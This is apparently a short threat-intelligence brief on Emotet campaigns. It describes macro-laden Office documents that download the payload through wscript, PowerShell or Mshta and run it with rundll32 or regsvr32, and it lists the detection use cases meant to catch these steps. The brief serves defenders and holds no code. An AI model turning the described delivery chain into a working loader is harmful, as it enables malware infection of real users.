April 26, 2022

Catching Up With Emotet

Industry: N/A | Level: Tactical | Source: Fortinet

Fortinet reviewed activity from Emotet campaigns through the delivery of malicious documents using a variety of attack techniques. Since the malware’s reemergence in November 202, it has been highly active. However, activity has slightly tapered potentially due to Microsoft disabling Excel 4.0 macro by default in January 2022. Analysis of five malicious document samples has identified the use of Excel or a Word document containing either malicious VBA macro or Excel 4.0 macro to deliver Emotet. The execution following the malware typically utilizes wscript, PowerShell, or Mshta to download the Emotet payload. Following its download, the malware would be executed with rundll32 or regsvr32.

  • Anvilogic Scenario: Emotet Behaviors
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Compressed File Execution
    • Wscript/Cscript Execution
    • Invoke-WebRequest Command
    • Suspicious File written to Disk
    • regsvr32 Execution
    • Rundll32 Command Line